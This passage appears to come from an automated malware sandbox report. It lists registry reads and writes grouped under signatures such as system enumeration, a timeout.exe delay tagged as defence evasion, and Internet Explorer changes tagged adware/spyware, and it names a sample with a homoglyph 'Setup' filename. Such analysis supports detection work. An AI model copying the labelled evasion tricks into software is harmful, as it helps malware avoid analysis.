Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\Desktop\Files\S%D0%B5tu%D1%80111.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Windows\system32\werfault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 C:\Windows\system32\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\SysWOW64\WerFault.exe N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\werfault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\system32\werfault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\SysWOW64\WerFault.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (data) \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\ProtocolExecute\microsoft-edge C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\EnterpriseMode\MSEdgePath = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29} C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\AppName = "ie_to_edge_stub.exe" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\AppName = "ie_to_edge_stub.exe" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\Policy = "3" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute\microsoft-edge C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EdgeIntegration\AdapterLocations C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\Main\EnterpriseMode C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\ProtocolExecute C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29} C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\AppPath = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\133.0.3065.59\\BHO" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\EdgeIntegration\AdapterLocations\C:\Program Files (x86)\Microsoft\Edge\Application = "1" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\ = "IEToEdge Handler" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\AppPath = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\133.0.3065.59\\BHO" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\ = "IEToEdge Handler" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\Policy = "3" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EdgeIntegration C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Edge\InstallerPinned = "0" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Edge C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 50,1329 10,1329 15,1329 100,1329 6" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
